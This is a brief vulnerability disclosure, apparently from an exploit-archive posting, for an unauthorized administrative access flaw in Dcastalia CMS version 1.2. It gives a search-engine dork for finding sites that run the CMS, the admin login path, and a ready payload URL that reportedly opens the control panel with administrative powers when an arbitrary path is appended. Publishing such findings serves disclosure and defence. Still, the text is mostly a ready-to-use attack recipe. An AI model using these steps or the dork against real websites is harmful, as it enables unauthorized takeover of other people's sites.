Dcastalia CMS version 1.2 suffers from an insecure direct object reference that allows users to access the administrative interface.
1a35e9872cec5605ab73f048283a4f65de419f7bf6127309146d0353fa3f7ea5
====================================================================================================================================
| # Title : Dcastalia CMS v1.2 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) |
| # Vendor : https://dcastalia.com/ |
| # Dork : "Designed & developed by dcastalia" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] admin Panle : /admin/site/login
[+] Use payload : /admin/Packet.Storm*Security
[-] When you add any value (For Example : a path or a variable) after the control panel folder,
an error page appears because the required file does not exist.
At the same time, it shows you the control panel for the site, and it gives you control powers according to the site,
including limited and full ones.
[+] https://www.127.0.0.1/admin/Packet%20Storm%20Security or https://www.127.0.0.1.com/admin/rbac/route
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================